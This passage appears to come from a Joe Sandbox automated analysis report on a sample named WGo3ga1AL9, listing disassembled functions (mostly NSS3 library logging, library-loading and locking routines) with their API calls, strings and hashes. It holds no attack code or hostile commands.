                                                                                                                                              • abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C758E76
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
                                                                                                                                              • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
                                                                                                                                              • API String ID: 977052965-1032500510
                                                                                                                                              • Opcode ID: 9b5ba1435fe9ae7e91b0bd9499dd81ac49aea32ea7c4b0e185c54fa07c6968fd
                                                                                                                                              • Instruction ID: e1d5254456f7f16cf5895706498c30e545d80b436dfe45e35d66cd15bc4f1a4c
                                                                                                                                              • Opcode Fuzzy Hash: 9b5ba1435fe9ae7e91b0bd9499dd81ac49aea32ea7c4b0e185c54fa07c6968fd
                                                                                                                                              • Instruction Fuzzy Hash: 1461A6B5D00106ABDB10CF55CE44AAFB7B5FF94358F544938DC18A7B40EB32A926CBA0
                                                                                                                                              Function 6C734E60 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 127COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6C734E83
                                                                                                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C734EB8
                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C734EC7
                                                                                                                                                • Part of subcall function 6C81D930: PL_strncpyz.NSS3(?,?,?), ref: 6C81D963
                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6C734EDD
                                                                                                                                              • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C734F0B
                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C734F1A
                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6C734F30
                                                                                                                                              • PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C734F4F
                                                                                                                                              • PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C734F68
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                              • String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue
                                                                                                                                              • API String ID: 1003633598-3530272145
                                                                                                                                              • Opcode ID: c4f70aaebb7dce8cefbb9cc4627ebaae56009f7a222efba603167ed621186522
                                                                                                                                              • Instruction ID: 8b7c2e48209d0c083958b9f24e6e5ee11d92b6ed1b85805346d2527d7845706b
                                                                                                                                              • Opcode Fuzzy Hash: c4f70aaebb7dce8cefbb9cc4627ebaae56009f7a222efba603167ed621186522
                                                                                                                                              • Instruction Fuzzy Hash: 5A410331606025AFDB218B14DF4CFAA3BB9AB4230DF086434F4095BB52C739A948DBD6
                                                                                                                                              Function 6C734CD0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 120COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C734CF3
                                                                                                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C734D28
                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C734D37
                                                                                                                                                • Part of subcall function 6C81D930: PL_strncpyz.NSS3(?,?,?), ref: 6C81D963
                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6C734D4D
                                                                                                                                              • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C734D7B
                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C734D8A
                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6C734DA0
                                                                                                                                              • PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C734DBC
                                                                                                                                              • PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C734E20
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                              • String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
                                                                                                                                              • API String ID: 1003633598-3553622718
                                                                                                                                              • Opcode ID: 9d879be05d3ef0bf3cb8d90ed35dcd35c686f52acc4f1493dc8451c4a78b2fd7
                                                                                                                                              • Instruction ID: 1b14b7ff3a4f52b0f8035fb2255722c78a017c5e0421b68d1587f5d9f63e999d
                                                                                                                                              • Opcode Fuzzy Hash: 9d879be05d3ef0bf3cb8d90ed35dcd35c686f52acc4f1493dc8451c4a78b2fd7
                                                                                                                                              • Instruction Fuzzy Hash: 8D412471605124AFD7218B14DF8DF7A3BB9AB4230DF046874E50D5BB12D739A848DBD2
                                                                                                                                              Function 6C737C90 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 110COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_LogPrint.NSS3(C_Verify), ref: 6C737CB6
                                                                                                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C737CE4
                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C737CF3
                                                                                                                                                • Part of subcall function 6C81D930: PL_strncpyz.NSS3(?,?,?), ref: 6C81D963
                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6C737D09
                                                                                                                                              • PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C737D2A
                                                                                                                                              • PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C737D45
                                                                                                                                              • PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6C737D5E
                                                                                                                                              • PR_LogPrint.NSS3( ulSignatureLen = %d,?), ref: 6C737D77
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                              • String ID: hSession = 0x%x$ pData = 0x%p$ pSignature = 0x%p$ ulDataLen = %d$ ulSignatureLen = %d$ (CK_INVALID_HANDLE)$C_Verify
                                                                                                                                              • API String ID: 1003633598-3278097884
                                                                                                                                              • Opcode ID: f89657dcc61dd16acf59abde3e05d3cc04d198655904f43b027bd09d5d738821
                                                                                                                                              • Instruction ID: 2a376e4abddbf549571a27d1fe7f2f61e4194feec7547da5ed4ac5db6613d96a
                                                                                                                                              • Opcode Fuzzy Hash: f89657dcc61dd16acf59abde3e05d3cc04d198655904f43b027bd09d5d738821
                                                                                                                                              • Instruction Fuzzy Hash: E331DF31602155EBDB218F25DF4DE7A37F5AB4220CF086474E40D5BB12DB38A848CBE2
                                                                                                                                              Function 6C7CCD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C7CCC7B), ref: 6C7CCD7A
                                                                                                                                                • Part of subcall function 6C7CCE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C73C1A8,?), ref: 6C7CCE92
                                                                                                                                              • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C7CCDA5
                                                                                                                                              • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C7CCDB8
                                                                                                                                              • PR_UnloadLibrary.NSS3(00000000), ref: 6C7CCDDB
                                                                                                                                              • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C7CCD8E
                                                                                                                                                • Part of subcall function 6C6F05C0: PR_EnterMonitor.NSS3 ref: 6C6F05D1
                                                                                                                                                • Part of subcall function 6C6F05C0: PR_ExitMonitor.NSS3 ref: 6C6F05EA
                                                                                                                                              • PR_LoadLibrary.NSS3(wship6.dll), ref: 6C7CCDE8
                                                                                                                                              • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C7CCDFF
                                                                                                                                              • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C7CCE16
                                                                                                                                              • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C7CCE29
                                                                                                                                              • PR_UnloadLibrary.NSS3(00000000), ref: 6C7CCE48
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
                                                                                                                                              • String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
                                                                                                                                              • API String ID: 601260978-871931242
                                                                                                                                              • Opcode ID: 8265056cad68ff0583820c511447759d02fbedc505f1b4fd24083e850732d0ff
                                                                                                                                              • Instruction ID: 67c34fa81f452e711d4843c846a8c45f4f4704388ec8f4d924e4d10f1b8255f4
                                                                                                                                              • Opcode Fuzzy Hash: 8265056cad68ff0583820c511447759d02fbedc505f1b4fd24083e850732d0ff
                                                                                                                                              • Instruction Fuzzy Hash: 5111DDD5F025321ADB1165B63E055BA38595B0334EF147935DC19D5F02FB10C50AC6FB
                                                                                                                                              Function 6C811C60 Relevance: 25.6, APIs: 17, Instructions: 114COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6C8113BC,?,?,?,6C811193), ref: 6C811C6B
                                                                                                                                              • PR_NewLock.NSS3(?,6C811193), ref: 6C811C7E
                                                                                                                                                • Part of subcall function 6C7C98D0: calloc.MOZGLUE(00000001,00000084,6C6F0936,00000001,?,6C6F102C), ref: 6C7C98E5
                                                                                                                                              • PR_NewCondVar.NSS3(00000000,?,6C811193), ref: 6C811C91
                                                                                                                                                • Part of subcall function 6C6EBB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C6F21BC), ref: 6C6EBB8C
                                                                                                                                              • PR_NewCondVar.NSS3(00000000,?,?,6C811193), ref: 6C811CA7
                                                                                                                                                • Part of subcall function 6C6EBB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C6EBBEB
                                                                                                                                                • Part of subcall function 6C6EBB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C6EBBFB
                                                                                                                                                • Part of subcall function 6C6EBB80: GetLastError.KERNEL32 ref: 6C6EBC03
                                                                                                                                                • Part of subcall function 6C6EBB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C6EBC19
                                                                                                                                                • Part of subcall function 6C6EBB80: free.MOZGLUE(00000000), ref: 6C6EBC22
                                                                                                                                              • PR_NewCondVar.NSS3(00000000,?,?,?,6C811193), ref: 6C811CBE
                                                                                                                                              • PR_NewCondVar.NSS3(00000000,?,?,?,?,6C811193), ref: 6C811CD4
                                                                                                                                              • calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6C811193), ref: 6C811CFE
                                                                                                                                              • PR_Lock.NSS3(?,?,?,?,?,?,?,6C811193), ref: 6C811D1A
                                                                                                                                                • Part of subcall function 6C7C9BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C6F1A48), ref: 6C7C9BB3
                                                                                                                                                • Part of subcall function 6C7C9BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C6F1A48), ref: 6C7C9BC8
                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6C811193), ref: 6C811D3D
                                                                                                                                                • Part of subcall function 6C7ADD70: TlsGetValue.KERNEL32 ref: 6C7ADD8C
                                                                                                                                                • Part of subcall function 6C7ADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7ADDB4
                                                                                                                                              • PR_SetError.NSS3(FFFFE890,00000000,?,6C811193), ref: 6C811D4E
                                                                                                                                              • PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6C811193), ref: 6C811D64
                                                                                                                                              • PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6C811193), ref: 6C811D6F
                                                                                                                                              • PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6C811193), ref: 6C811D7B
                                                                                                                                              • PR_DestroyCondVar.NSS3(?,?,?,?,?,6C811193), ref: 6C811D87
                                                                                                                                              • PR_DestroyCondVar.NSS3(00000000,?,?,?,6C811193), ref: 6C811D93
                                                                                                                                              • PR_DestroyLock.NSS3(00000000,?,?,6C811193), ref: 6C811D9F
                                                                                                                                              • free.MOZGLUE(00000000,?,6C811193), ref: 6C811DA8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3246495057-0
                                                                                                                                              • Opcode ID: 4468bdb1060bcd4c352beac36369694c1b6baf0e5840685d28201d6e8b5dd823
                                                                                                                                              • Instruction ID: cd69f1eaccf644222c2509cf156d06c6ba2fc97b4108c5f494b52fc20a12e07d
                                                                                                                                              • Opcode Fuzzy Hash: 4468bdb1060bcd4c352beac36369694c1b6baf0e5840685d28201d6e8b5dd823
                                                                                                                                              • Instruction Fuzzy Hash: 3131E6F5E007025FEB219F65AD45A677AF4AF1660DB044839E84A87F41FB31E408CBA6
                                                                                                                                              Function 6C725E60 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 348COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C725ECF
                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C725EE3
                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C725F0A
                                                                                                                                              • PK11_MakeIDFromPubKey.NSS3(00000014), ref: 6C725FB5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalEnterFromK11_MakeSectionUnlockValue
                                                                                                                                              • String ID: NSS_USE_DECODED_CKA_EC_POINT$S&tl$S&tl
                                                                                                                                              • API String ID: 2280678669-3603847617
                                                                                                                                              • Opcode ID: 2684eacac455e722b4813bd71967e493ca0307c862177ab6b1cb491b58088977
                                                                                                                                              • Instruction ID: fe6d664eccdd94d0348f31d852998f4d2dbd1cd341e2389bdbfdf7c369760257
                                                                                                                                              • Opcode Fuzzy Hash: 2684eacac455e722b4813bd71967e493ca0307c862177ab6b1cb491b58088977
                                                                                                                                              • Instruction Fuzzy Hash: 12F1E5B5A002158FDB54CF18C984B86BBF4FF09308F5582AAD8089F746E774EA95CF91
                                                                                                                                              Function 004119F0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 160stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcessstrtok_s
                                                                                                                                              • String ID: block
                                                                                                                                              • API String ID: 3407564107-2199623458
                                                                                                                                              • Opcode ID: 1f0f84f1c6c132a16ad49c43e162cf8975f1175bc1bc8b8d234cf50fd6cc2e6d
                                                                                                                                              • Instruction ID: 24cedd258c0b2a3a786e48f87e23423129f016670b7ad46fccbec0895e921d59
                                                                                                                                              • Opcode Fuzzy Hash: 1f0f84f1c6c132a16ad49c43e162cf8975f1175bc1bc8b8d234cf50fd6cc2e6d
                                                                                                                                              • Instruction Fuzzy Hash: 00513174B0A109DFCB04DF94D984FEE77B9AF44704F10405AE502AB261E778EA91CB5A
                                                                                                                                              Function 6C770C60 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 153memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SECOID_GetAlgorithmTag_Util.NSS3(*,wl), ref: 6C770C81
                                                                                                                                                • Part of subcall function 6C75BE30: SECOID_FindOID_Util.NSS3(6C71311B,00000000,?,6C71311B,?), ref: 6C75BE44
                                                                                                                                                • Part of subcall function 6C748500: SECOID_GetAlgorithmTag_Util.NSS3(6C7495DC,00000000,00000000,00000000,?,6C7495DC,00000000,00000000,?,6C727F4A,00000000,?,00000000,00000000), ref: 6C748517
                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C770CC4
                                                                                                                                                • Part of subcall function 6C75FAB0: free.MOZGLUE(?,-00000001,?,?,6C6FF673,00000000,00000000), ref: 6C75FAC7
                                                                                                                                              • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C770CD5
                                                                                                                                              • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C770D1D
                                                                                                                                              • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C770D3B
                                                                                                                                              • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C770D7D
                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C770DB5
                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C770DC1
                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C770DF7
                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C770E05
                                                                                                                                              • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C770E0F
                                                                                                                                                • Part of subcall function 6C7495C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C727F4A,00000000,?,00000000,00000000), ref: 6C7495E0
                                                                                                                                                • Part of subcall function 6C7495C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C727F4A,00000000,?,00000000,00000000), ref: 6C7495F5
                                                                                                                                                • Part of subcall function 6C7495C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C749609
                                                                                                                                                • Part of subcall function 6C7495C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C74961D
                                                                                                                                                • Part of subcall function 6C7495C0: PK11_GetInternalSlot.NSS3 ref: 6C74970B
                                                                                                                                                • Part of subcall function 6C7495C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C749756
                                                                                                                                                • Part of subcall function 6C7495C0: PK11_GetIVLength.NSS3(?), ref: 6C749767
                                                                                                                                                • Part of subcall function 6C7495C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C74977E
                                                                                                                                                • Part of subcall function 6C7495C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C74978E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                                                                              • String ID: *,wl$*,wl$-$wl
                                                                                                                                              • API String ID: 3136566230-962488925
                                                                                                                                              • Opcode ID: 42c54cf8603e0a86bce4476d41abac19fd68b50bb4f3267426f1007664103001
                                                                                                                                              • Instruction ID: b816b922590dc016f9f17d4c8602b91850cafbd3d9f20ac6edf265c1ac21a9f6
                                                                                                                                              • Opcode Fuzzy Hash: 42c54cf8603e0a86bce4476d41abac19fd68b50bb4f3267426f1007664103001
                                                                                                                                              • Instruction Fuzzy Hash: 1241C2B5900249ABEF109F65DE4ABAF7678AF0530CF104134E91557742EB36EA18CBF2
                                                                                                                                              Function 6C765CA0 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
